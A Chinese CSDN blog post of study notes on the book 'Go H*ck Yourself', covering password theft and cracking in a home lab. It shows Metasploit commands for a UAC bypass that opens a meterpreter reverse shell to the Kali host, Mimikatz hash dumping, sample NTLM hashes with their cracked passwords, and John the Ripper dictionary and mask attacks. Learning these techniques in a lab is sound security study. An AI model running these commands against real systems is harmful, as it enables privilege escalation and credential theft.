GO H*CK YOURSELF:新知识点的记录(2)

已于 2022-02-17 19:34:23 修改
阅读量488 收藏
点赞数
分类专栏: 读原著笔记 文章标签: golang gnu 开发语言
于 2022-02-16 16:17:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/122966139
版权

STEALING AND CRACKING PASSWORDS

首先批量创建一些用户:

C:\WINDOWS\system32> net user ana Password1 /add
C:\WINDOWS\system32> net user ben P@$$w0rd! /add
C:\WINDOWS\system32> net user carol CaptainMarvel /add
C:\WINDOWS\system32> net user clark superman20 /add
C:\WINDOWS\system32> net user kara SuperGirl7! /add
C:\WINDOWS\system32> net user peter SpidermanRulez:) /add

反射进入后,进行提权,windows需要提权到system类型的用户,才能对口令进行破解

于是需要新建一个session

set payload windows/meterpreter/reverse_tcp

use exploit/windows/local/bypassuac_fodhelper

set SESSION 1

set LHOST 10.10.10.4     #Kali IP

exploit

此处根据Windows10的版本,有可能不成功的情况

若成功,开启一个新的meterpreter

 用Mimikatz窃取密码哈希

 dump the password hashes for all users from the Windows 10 VM

 

 可以把user、hash复制下来,备用

口令破解:字典攻击、暴力破解

具体方法:

Free Online Password Databases

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512, Wordpress, Bcrypt hashes for free onlinehttps://hashes.com/en/decrypt/hash测试:

64f12cddaa88057e06a81b54e73b949b:Password1
85f4aaf6ac4fac1d9b55e6b880bcda3e:CaptainMarvel
920ae267e048417fcfe00f49ecbd4b33:P@$$w0rd!
d6566eae841e523df8fd96a42bcbd4ac:superman20
fc525c9683e8fe067095ba2ddc971889:Passw0rd!--snip--

John the Ripper(jonny 一个GUI界面)

Kali有几个内置词表,包括RockYou词表。RockYou是一家公司,在2009年的一次著名的漏洞中丢失了3200万用户的密码,该漏洞涉及一个保护较差的web应用程序。

要访问RockYou单词列表,请在终端窗口中输入以下命令:

kali@kali:~$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz

john简单用法:

john --wordlist=/usr/share/wordlists/rockyou.txt --rules --format=NT --fork=3 windows_hash

A Dictionary Attack with mask

掩码攻击从部分信息(如旧密码)开始,并添加字符以尝试破解类似密码。

 举例:

在Johnny中,我们可以在SuperGir的末尾添加通配符,以尝试猜测Kara的其他密码可能是什么。

我们可以用通配符吗?u代表大写字母?l代表小写字母?d表示数字(0-9)?s是特殊符号,?a用于所有可打印字符(字母、数字、标点符号和特殊字符)。

即使使用较短的密码而不是密码短语,添加另一种语言的特殊字符也会使破解变得更加困难。

在没有数字键盘的笔记本电脑上,您可以按Windows键和句点键(Windows-.)插入表情符号或其他符号。✔℃

 

花纵酒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MindF*ck:Brainf * ck的方言-开源
04-26
命令列表如下://///////////////////// BrainF * ck命令//////////////// ////////>右移<左移+ Inc-Dec [如果非零则开始]结束while-如果零则中断(如果非零则跳转到地址)。 读取char,获取char //////////////...
braievaluck:使用其他语言的Brainf * ck实现
02-05
6. **脚本语言与编译语言**:Ruby、Python、Perl、Lua 和 Bash 属于脚本语言,它们的实现可能更依赖于解释器,而 Golang 是编译语言,其执行效率可能更高。 7. **文本处理与系统编程**:Perl 在文本处理方面强大,而...
GO H*CK YOURSELF知识点记录(3)
lm19770429的专栏
02-17 382
WEB HACKING 练习靶场地址:https://nostarch.com/go-hck-yourself/https://nostarch.com/go-hck-yourself/
GO H*CK YOURSELF知识点记录(1)截至第6章
lm19770429的专栏
02-13 1661
高级搜索技巧: For example, the operator ext: searches for specific file extensions, or the filename endings for different types of files. Examples include docx for Microsoft Word documents, txt for plaintext, pdf for PDF files, xlsx for Microsoft Excel spreadsh
qcon_从QCon伦敦2011中学到的主要知识点和教训
cunfu6353的博客
07-14 3721
qcon 在本文中,我们介绍了一些博客和推特上有关QCon London 2011的与会者所看到的要点。 这次QCon,在伦敦举行的第 5 届,在世界第 14 届 ,已在会议召开前几周售罄,共有850多位与会者包括100多位演讲者! QCon伦敦会议由InfoQ.com和Trifork共同制作,该公司在丹麦举办了GOTO会议。 QCon将继续在每年的3月在伦敦运行, QCon SF将在今年11月...
CK2Plus:十字军之王 2 的 CK2Plus 模组-开源
05-29
CK2Plus:十字军之王2的开源模组解析》 十字军之王2(Crusader Kings II,简称CK2)是一款深受玩家喜爱的历史模拟策略游戏,由Paradox Interactive开发并发行。CK2以其丰富的历史背景、复杂的角色互动和深远的...
CK2Plus_Rewrite:完全重写CK2Plus Mod的所在地
05-21
顾名思义,CK2 +的存在可为您提供更多-更多内容,更多选择,更多乐趣。 目的是在不偏离原始游戏机制或添加过多确定性事件的情况下,提供更深,更具挑战性的CK2体验。 这个mod的目的不是历史准确性(尽管我们会尽量...
人教版七年级下册英语Unit 2知识点汇总.docx
03-21
### 人教版七年级下册英语Unit 2知识点汇总 #### 一、词汇拓展 在本单元中,学生将学习一系列重要的词汇及其变化形式,包括反义词、第三人称单数形式、名词复数形式等。这些词汇的掌握对于提高学生的语言运用能力...
一文掌握 Go 内存对齐
newbietao的博客
08-23 784
例如,对于一个 32 位的整数,如果存储在非 4 字节对齐的地址上,可能需要两次内存读取操作才能获取完整的数据,而在对齐的地址上,一次读取操作即可。内存对齐是一种将数据在内存中进行排列的方式,目的是提高内存访问的效率和保证数据的完整性。数据的内存排列方式最直观的体现就是数据的内存地址,说白了就是数据的内存地址要符合一定规则,以便于CPU读取,这个规则就是下面要讲的内存对齐规则。上面的输出和我们的结论是契合的,内存地址都是对齐值的倍数,另外还有一点,为了减少内存开销,编译器还会优化内存布局,减少内存碎片。
Golang | Leetcode Golang题解之第354题俄罗斯套娃信封问题
weixin_66442839的博客
08-21 417
Golang | Leetcode Golang题解之第354题俄罗斯套娃信封问题
Golang | Leetcode Golang题解之第363题矩形区域不超过K的最大数值和
weixin_66442839的博客
08-22 263
Golang | Leetcode Golang题解之第363题矩形区域不超过K的最大数值和
Golang | Leetcode Golang题解之第357题统计各位数字都不同的数字个数
weixin_66442839的博客
08-22 291
Golang | Leetcode Golang题解之第357题统计各位数字都不同的数字个数
【国密SM2、SM3】Go、Java和 IavaScript 签名三端兼容
qiqi123j的博客
08-21 1362
ASN.1 – Abstract Syntax Notation dot one,抽象记法1。所有X.509都是DER编码,DER是指ASN.1的编码规则。2010年12月17日,国家密码管理局关于发布。椭圆曲线方程:y2 = x3 + ax + b。2010年12月17日,国家密码管理局关于发布。推荐使用素数域256位椭圆曲线。
Java共享内容通信 VS Golang通信共享内存
最新发布
Czh的博客
08-24 306
最近在学习并发编程的时候,发现一个很有意思的点:Java基于共享共享内存通信,而Golang则是通过通信共享内存。为什么?下面我们一起一探究竟!
Go小技巧&易错点100例(十七)
做兴趣使然的Hero
08-21 743
总的来说,Go语言中的定时任务具有广泛的应用场景和灵活的使用方法,可以帮助开发人员更好地管理和优化应用程序。在Go语言中,定时任务(也称为定时器或cron作业)具有多种作用,这些作用在应用程序的开发和运维中非常有用。​,Go 程序可以调用 C 函数,使用 C 语言定义的数据类型,甚至可以使用 C 语言的头文件和源文件。这个类型的定时任务使用cron表达式进行任务的处理,比如下面代码的cron表达式。这个类型的定时任务是直接使用Go语言的内置类型进行计算,比较简单。(2)创建cron类型的定时任务。
[go] 用ticker定时器来替代循环任务
wecode666
08-22 255
使用 time.Ticker 来定期执行检查,间隔可以根据需求调整(例如每秒检查一次)。
go+gin+vue入门
yeanhoo的博客
08-23 300
src目录下创建views目录,目录下建vue组件,Login.vue。5、按照项目框架搭建目录、文件、代码:如router、model…7、按照项目框架搭建目录、文件、代码:如router、views…初始化数据库:创建model目录,目录下创建init.go文件。初始化路由:创建router目录,目录下创建app.go文件。src目录下创建router目录,目录下创建index.ts。6、运行测试,go run main.go。1、安装node.js、WebStorm。1、安装go、goland。
golang中channel什么时候会阻塞
weixin_39289004的博客
08-21 540
通道的阻塞机制是 Go 实现并发的重要特性,它确保了数据的安全传递和同步。在使用通道时,理解何时会阻塞对于编写高效的并发程序至关重要。
2N7002CK-VB:低阈值N沟道SOT23 MOSFET
"2N7002CK-VB是一种N沟道SOT23封装的MOSFET,适用于低电压、高速电路应用,如直接逻辑级接口、驱动器和电池供电系统。这款MOSFET具有低阈值电压、低输入电容、快速开关速度和低输入及输出泄漏电流等特点。" 2N7002...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值